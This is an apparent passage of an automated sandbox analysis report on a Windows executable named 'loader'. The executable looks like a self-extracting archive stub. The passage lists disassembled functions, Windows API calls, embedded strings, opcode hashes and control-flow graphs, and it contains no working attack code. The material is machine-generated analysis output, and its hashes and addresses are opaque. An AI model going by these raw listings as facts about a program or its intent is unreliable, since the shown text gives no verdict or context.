                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<f,00000800,?,00000000,?,00000800), ref: 00640C9C
                                                                                    • _swprintf.LIBCMT ref: 00640D4A
                                                                                    • _swprintf.LIBCMT ref: 00640D96
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • _wcslen.LIBCMT ref: 00640DC4
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _swprintf$AttributesFile__vswprintf_c_l_wcslen
                                                                                    • String ID: ,<f$D=f$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<f
                                                                                    • API String ID: 2834821262-3323918312
                                                                                    • Opcode ID: e42549ad0689bb52e80ba9c614a8cbc173843e4b4308347d17e8187fdec4577b
                                                                                    • Instruction ID: 5319171e34d8289c628792532dee11081f478c3d28036bc5a35f324c8b11877c
                                                                                    • Opcode Fuzzy Hash: e42549ad0689bb52e80ba9c614a8cbc173843e4b4308347d17e8187fdec4577b
                                                                                    • Instruction Fuzzy Hash: D2D161B14083A4AFD7219F50C989BDFBEEFAF85704F50491DF28596350CBB18648CBA6

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0064C744
                                                                                      • Part of subcall function 0064AF98: _wcschr.LIBVCRUNTIME ref: 0064B033
                                                                                    • _wcslen.LIBCMT ref: 0064CA0A
                                                                                    • _wcslen.LIBCMT ref: 0064CA13
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0064CA71
                                                                                    • _wcslen.LIBCMT ref: 0064CAB3
                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0064CBFB
                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0064CC36
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0064CC46
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,0067A472), ref: 0064CC54
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0064CC7F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                                                                    • String ID: %s.%d.tmp$<br>$<d$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$d
                                                                                    • API String ID: 3356938749-288287190
                                                                                    • Opcode ID: 78e9c63b7839bddd5d9f97526a3ea8ca45d4c3b7025584afa2dbc9191a7d8738
                                                                                    • Instruction ID: c0d8a3179d076f54485abc823ec3aeff0f5e6b24534fe7b0567a1c0d184142ee
                                                                                    • Opcode Fuzzy Hash: 78e9c63b7839bddd5d9f97526a3ea8ca45d4c3b7025584afa2dbc9191a7d8738
                                                                                    • Instruction Fuzzy Hash: DFE16472D00128AADB65DBA4DD85DEE73BEEB05350F0040AAF649E3250EF749F848F64
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0063DA70
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0063DA91
                                                                                      • Part of subcall function 0063C29A: _wcslen.LIBCMT ref: 0063C2A2
                                                                                      • Part of subcall function 006405DA: _wcslen.LIBCMT ref: 006405E0
                                                                                    • _wcslen.LIBCMT ref: 0063DDE9
                                                                                    • __fprintf_l.LIBCMT ref: 0063DF1C
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                                                                    • API String ID: 1810648836-2415259559
                                                                                    • Opcode ID: 2bd1205c545f0a081dee8f87e9f90cf2489cd517aaa2bd79816e723756b45b41
                                                                                    • Instruction ID: c7a7809f0e67f52574d60497dd6d4e430e4856e86104172ea221da44d4eb94bf
                                                                                    • Opcode Fuzzy Hash: 2bd1205c545f0a081dee8f87e9f90cf2489cd517aaa2bd79816e723756b45b41
                                                                                    • Instruction Fuzzy Hash: E732C171900218EBDF28EF68D842BEE77AAFF14704F40055AF90597291E7B2DD85CBA4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    • GetDlgItem.USER32(00000068,0068FCB8), ref: 0064D4E8
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0064AF07,00000001,?,?,0064B7B9,0066506C,0068FCB8,0068FCB8,00001000,00000000,00000000), ref: 0064D510
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064D51B
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064D529
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D53F
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0064D559
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D59D
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0064D5AB
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D5BA
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D5E1
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,006643F4), ref: 0064D5F0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 3569833718-2967466578
                                                                                    • Opcode ID: aefb5fbe13fdebff8a82c2bf2a4195b2a74b01e6717d755c7b26480d7ab0afcf
                                                                                    • Instruction ID: b54edbadf7ecad1da740ca95cdd75f3c9b5f0fd4f4f35318459fde9c77997c0a
                                                                                    • Opcode Fuzzy Hash: aefb5fbe13fdebff8a82c2bf2a4195b2a74b01e6717d755c7b26480d7ab0afcf
                                                                                    • Instruction Fuzzy Hash: 4531D471145352BFE301DF20DC4AFAB7FAEEB86708F000509F551962A0EB659A04CB7A

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$ExecuteShell_wcslen
                                                                                    • String ID: .exe$.inf$Install$hd$rd
                                                                                    • API String ID: 855908426-4153170921
                                                                                    • Opcode ID: 27cd10ef76339ffbad92ceeec6748f8e6f89b2ac2fbd085fc258e0a7fb5cb403
                                                                                    • Instruction ID: e4cf7f1cafcd4b9fd253f9ffd5a79391be8ce996ff51956d95c1001398eeb4b9
                                                                                    • Opcode Fuzzy Hash: 27cd10ef76339ffbad92ceeec6748f8e6f89b2ac2fbd085fc258e0a7fb5cb403
                                                                                    • Instruction Fuzzy Hash: 9651A170904380AEDB219F249845BFBBBE7AF82744F04181EF9C5D73A1E7718A85CB52

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 931 64b568-64b581 PeekMessageW 932 64b583-64b597 GetMessageW 931->932 933 64b5bc-64b5be 931->933 934 64b5a8-64b5b6 TranslateMessage DispatchMessageW 932->934 935 64b599-64b5a6 IsDialogMessageW 932->935 934->933 935->933 935->934
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                    • IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                    • TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                    • DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: cc08f88f4295828b36afb2cc00555593f44addf4a4b81c048a9c4b25c68160f4
                                                                                    • Instruction ID: 53a5fc5712cf306f14c791253dd15ad0b6251f220926637b7e19e7b3de904bfa
                                                                                    • Opcode Fuzzy Hash: cc08f88f4295828b36afb2cc00555593f44addf4a4b81c048a9c4b25c68160f4
                                                                                    • Instruction Fuzzy Hash: F3F0D071A0122AAB8B249FE5DC4DDDBBFBDEE053917005416B519D2210EB74D605CBB0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 936 64abab-64abca GetClassNameW 937 64abf2-64abf4 936->937 938 64abcc-64abe1 call 641fbb 936->938 939 64abf6-64abf9 SHAutoComplete 937->939 940 64abff-64ac01 937->940 943 64abf1 938->943 944 64abe3-64abef FindWindowExW 938->944 939->940 943->937 944->943
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0064ABC2
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0064ABE9
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0064ABF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompleteFindNameWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 1162832696-3080729518
                                                                                    • Opcode ID: 882e5e3329efd4aaeb1a32e61e95b92a5501dce59b03f7c2eb843b299596e15b
                                                                                    • Instruction ID: c7164ff454fdd491f5bcf9c6044897fd5326da1335ad5fba1c7ffd2ca28e0b89
                                                                                    • Opcode Fuzzy Hash: 882e5e3329efd4aaeb1a32e61e95b92a5501dce59b03f7c2eb843b299596e15b
                                                                                    • Instruction Fuzzy Hash: D7F0823664122876DB305A649C0AFEB76AE9B46B40F484016BA05E62C0DB60DE4585BA

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 0064AC2F
                                                                                    • SHGetMalloc.SHELL32(00678438), ref: 0064AC70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeMalloc
                                                                                    • String ID: riched20.dll
                                                                                    • API String ID: 48681180-3360196438
                                                                                    • Opcode ID: d06162457e48745bddec1089230f9e8bf27f2013c629d024bda3f4fade9be4da
                                                                                    • Instruction ID: 4d5603d5b599c23a7505a784576e2ff63f777f95c66ae485ab10d3898a0535ab
                                                                                    • Opcode Fuzzy Hash: d06162457e48745bddec1089230f9e8bf27f2013c629d024bda3f4fade9be4da
                                                                                    • Instruction Fuzzy Hash: F8F067B1D00219AFCB10AFAAD9499EFFFFEEF84700F00405AE815E2201CBB456058FA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 951 64dbde-64dc12 call 64ec50 call 640371 957 64dc14-64dc18 951->957 958 64dc36-64dc38 951->958 959 64dc21-64dc28 call 64048d 957->959 962 64dc1a-64dc20 959->962 963 64dc2a-64dc30 SetEnvironmentVariableW 959->963 962->959 963->958
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0064DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: 63f053bf23616df560d7b7c26de1e25c3e1b12f21cdd34b8974c89c747846d59
                                                                                    • Instruction ID: e21d002d665ccba81cd5e05b56583e028d31fc97a0c005664718c343c114de45
                                                                                    • Opcode Fuzzy Hash: 63f053bf23616df560d7b7c26de1e25c3e1b12f21cdd34b8974c89c747846d59
                                                                                    • Instruction Fuzzy Hash: 5BF0E5B2804234ABDB202FD58C46BFABB9FAF06B81B040415FE8696251E6F08940D6B4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 964 65a95b-65a974 965 65a976-65a986 call 65ef4c 964->965 966 65a98a-65a98f 964->966 965->966 971 65a988 965->971 968 65a991-65a999 966->968 969 65a99c-65a9c0 966->969 968->969 973 65a9c6-65a9d2 969->973 974 65ab53-65ab66 call 64fbbc 969->974 971->966 976 65a9d4-65a9e5 973->976 977 65aa26 973->977 980 65aa04-65aa15 call 658e06 976->980 981 65a9e7-65a9f6 call 662010 976->981 979 65aa28-65aa2a 977->979 984 65aa30-65aa43 979->984 985 65ab48 979->985 980->985 991 65aa1b 980->991 981->985 990 65a9fc-65aa02 981->990 984->985 995 65aa49-65aa5b call 65af6c 984->995 986 65ab4a-65ab51 call 65abc3 985->986 986->974 994 65aa21-65aa24 990->994 991->994 994->979 997 65aa60-65aa64 995->997 997->985 998 65aa6a-65aa71 997->998 999 65aa73-65aa78 998->999 1000 65aaab-65aab7 998->1000 999->986 1001 65aa7e-65aa80 999->1001 1002 65ab03 1000->1002 1003 65aab9-65aaca 1000->1003 1001->985 1004 65aa86-65aaa0 call 65af6c 1001->1004 1005 65ab05-65ab07 1002->1005 1006 65aae5-65aaf6 call 658e06 1003->1006 1007 65aacc-65aadb call 662010 1003->1007 1004->986 1019 65aaa6 1004->1019 1009 65ab41-65ab47 call 65abc3 1005->1009 1010 65ab09-65ab22 call 65af6c 1005->1010 1006->1009 1018 65aaf8 1006->1018 1007->1009 1021 65aadd-65aae3 1007->1021 1009->985 1010->1009 1024 65ab24-65ab2b 1010->1024 1023 65aafe-65ab01 1018->1023 1019->985 1021->1023 1023->1005 1025 65ab67-65ab6d 1024->1025 1026 65ab2d-65ab2e 1024->1026 1027 65ab2f-65ab3f 1025->1027 1026->1027 1027->1009 1029 65ab6f-65ab76 call 65abc3 1027->1029 1029->986
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea
                                                                                    • String ID:
                                                                                    • API String ID: 240046367-0
                                                                                    • Opcode ID: de5e6ec3d5c47f6fbd50b3c5e380361fb427360405ba927bf1700616b734ad24
                                                                                    • Instruction ID: 0c04ec0de1f59ea57cec8bf5594ccbfb5a74f6404a41512945f2ba1bcf2ebc23
                                                                                    • Opcode Fuzzy Hash: de5e6ec3d5c47f6fbd50b3c5e380361fb427360405ba927bf1700616b734ad24
                                                                                    • Instruction Fuzzy Hash: 5751BF72A10216AFDB258FA4DC42EEBBBABEB44751F154729FC04D7240EB34DC58C692

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1032 64a6c2-64a6df 1034 64a6e5-64a6f6 1032->1034 1035 64a7db 1032->1035 1034->1035 1038 64a6fc-64a70b 1034->1038 1036 64a7dd-64a7e1 1035->1036 1038->1035 1040 64a711-64a71c 1038->1040 1040->1035 1042 64a722-64a737 1040->1042 1044 64a7d3-64a7d9 1042->1044 1045 64a73d-64a746 1042->1045 1044->1036 1047 64a7cc 1045->1047 1048 64a74c-64a76a call 650320 CreateStreamOnHGlobal 1045->1048 1047->1044 1051 64a7c5 1048->1051 1052 64a76c-64a78e call 64a626 1048->1052 1051->1047 1052->1051 1057 64a790-64a798 1052->1057 1058 64a7b3-64a7c1 1057->1058 1059 64a79a-64a7a7 call 64eb26 1057->1059 1058->1051 1061 64a7ac-64a7ae 1059->1061 1061->1058 1063 64a7b0 1061->1063 1063->1058
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0064A762
                                                                                      • Part of subcall function 0064A626: 739A6BB0.GDIPLUS(00000010), ref: 0064A62C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID: PNG
                                                                                    • API String ID: 2244384528-364855578
                                                                                    • Opcode ID: 1237a27d039818d312dbcb38a80f5bff0dc7d01f0b36370eddb9abf3cb29a2d6
                                                                                    • Instruction ID: d6a4fff3416979e535eeea9914fdf9825188d9b004d3ef3831257b387d22516a
                                                                                    • Opcode Fuzzy Hash: 1237a27d039818d312dbcb38a80f5bff0dc7d01f0b36370eddb9abf3cb29a2d6
                                                                                    • Instruction Fuzzy Hash: 61318F79640312BFD7209F61EC88D5BBBBBEF86750B041519F805C2720EB71DD44DAA1

                                                                                    Control-flow Graph: first block 65ba27-65ba51 (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                      • Part of subcall function 006597E5: _free.LIBCMT ref: 0065981C
                                                                                      • Part of subcall function 006597E5: _abort.LIBCMT ref: 00659863
                                                                                      • Part of subcall function 0065BB4E: _abort.LIBCMT ref: 0065BB80
                                                                                      • Part of subcall function 0065BB4E: _free.LIBCMT ref: 0065BBB4
                                                                                    • _free.LIBCMT ref: 0065BA9F
                                                                                    • _free.LIBCMT ref: 0065BAD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 195396716-0
                                                                                    • Opcode ID: be2eba42cb637e772f294809cf4db8ddf717d798fad4c8f0045b8c891fc606d8
                                                                                    • Instruction ID: fdd91d60e7fff1b8ce681f135430301d0d84159a1cf7da18c89fd3342f1482c5
                                                                                    • Opcode Fuzzy Hash: be2eba42cb637e772f294809cf4db8ddf717d798fad4c8f0045b8c891fc606d8
                                                                                    • Instruction Fuzzy Hash: 9F31B131904209AFDB10EFA9D441B99B7F7EF40322F21509DEC04AB2A2EB725D49DB54

                                                                                    Control-flow Graph: first block 631e50-631e7f (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00631E55
                                                                                      • Part of subcall function 00633BBA: __EH_prolog.LIBCMT ref: 00633BBF
                                                                                    • _wcslen.LIBCMT ref: 00631EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2838827086-0
                                                                                    • Opcode ID: 3e9828c314e5d60f9ce2ecc50892e2a84a76f2f0c202cf13d088372d282aaa54
                                                                                    • Instruction ID: 1a4c244c6457ff221200d4ee4cf254354b961017371fe81aecdf581849ee6f63
                                                                                    • Opcode Fuzzy Hash: 3e9828c314e5d60f9ce2ecc50892e2a84a76f2f0c202cf13d088372d282aaa54
                                                                                    • Instruction Fuzzy Hash: 33314971904209AFCF51DF98C945AEEBBF6AF09300F10046EF845AB251CB325E51CBA4

                                                                                    Control-flow Graph: first block 659869-659880 (legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 1043c89dc87cdf2b90e7d1c9532624618a85e4d88754971d0b2e2599abf5c82c
                                                                                    • Instruction ID: dedc03ad0738f684ca5e25291678a37f3249f2accae8540893303404b28f9545
                                                                                    • Opcode Fuzzy Hash: 1043c89dc87cdf2b90e7d1c9532624618a85e4d88754971d0b2e2599abf5c82c
                                                                                    • Instruction Fuzzy Hash: 6A014436104701EBC3122764AC8595B256FDFD3373F200A39FC04A2392EF608C0E5178
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000001,00000001,?,0063A23A,?,0063A2E9,00000001,00000001,?,?,0063A175,?,00000001,00000000,?,?), ref: 0063A254
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000001,?,00000800,?,0063A23A,?,0063A2E9,00000001,00000001,?,?,0063A175,?,00000001,00000000), ref: 0063A280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: a9735e9634b8407b99b083dd6f0b4aabaa23ca1bf1a6d8a4e9a626d678e600a6
                                                                                    • Instruction ID: a6c2d580e21b31cba7558889c66350b15e2c79a399b3421511416d7298d79822
                                                                                    • Opcode Fuzzy Hash: a9735e9634b8407b99b083dd6f0b4aabaa23ca1bf1a6d8a4e9a626d678e600a6
                                                                                    • Instruction Fuzzy Hash: 97E092319001245BCB50AB64CC05BD9B75EAB083E1F044261FE95E3290DB71DE44CBE0
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0064DEEC
                                                                                      • Part of subcall function 00634092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006340A5
                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0064DF03
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2718869927-0
                                                                                    • Opcode ID: 7407449c355f39471f6f0f0fbe4116029e402f80444e3c01bf918cf82ed6aafc
                                                                                    • Instruction ID: a0e5e918a8d0b9fa9e3e6836f77bec490a1238ebea12976b82ccfd1b5005b66b
                                                                                    • Opcode Fuzzy Hash: 7407449c355f39471f6f0f0fbe4116029e402f80444e3c01bf918cf82ed6aafc
                                                                                    • Instruction Fuzzy Hash: FAE0D8B65003582ADF42AF60DC0BFDE3BAE5B05785F040855B204DB0F3DA79EA908775
                                                                                    APIs
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00652BAA
                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00652BB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                    • String ID:
                                                                                    • API String ID: 1660781231-0
                                                                                    • Opcode ID: d47c5720280724db0257b02f28512b009159b135a453327a97f13a41ecab7d80
                                                                                    • Instruction ID: dd70f88e617f786b09babce871d4280dd324ef8df339bf9fc8e5ed5466a0192e
                                                                                    • Opcode Fuzzy Hash: d47c5720280724db0257b02f28512b009159b135a453327a97f13a41ecab7d80
                                                                                    • Instruction Fuzzy Hash: 55D0A939154213294E942A7068B2488335BAE43BBBFE0138EEC2085AC1EB11808CA11A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3351165006-0
                                                                                    • Opcode ID: a3021daa5e55b96f0301c2a04931665250d7f5a50b248553987c4a04ba065242
                                                                                    • Instruction ID: 32e29a213c092f7b832ffa0f9577d3b500fdaed30e7165b5ecc20ba66fb26814
                                                                                    • Opcode Fuzzy Hash: a3021daa5e55b96f0301c2a04931665250d7f5a50b248553987c4a04ba065242
                                                                                    • Instruction Fuzzy Hash: 98C0123605C220BECB010FB4DC09C2BBBAEABA5316F04C90AB0A5C0270C239C110DB11
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 1395f984ab2cfb24f20b5c4e0b260041fb34ff706c90f79a93bbdf2e23faabda
                                                                                    • Instruction ID: 297c52269dfd1466b33962c74e3c938f389a27443e0be387b770c5a3a1472d57
                                                                                    • Opcode Fuzzy Hash: 1395f984ab2cfb24f20b5c4e0b260041fb34ff706c90f79a93bbdf2e23faabda
                                                                                    • Instruction Fuzzy Hash: 2BC19170A002549FEF15CF68C894BE9BBA7AF17310F0805B9EC469F396DB349945CBA1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 036ab9513505a17285df9c0b70a40a2499bc05af2c9a37c0c7e39903daf691d3
                                                                                    • Instruction ID: c2a21ffefba45d42faa8bc92c5702582ed3084aa901fca788114e148e12baaea
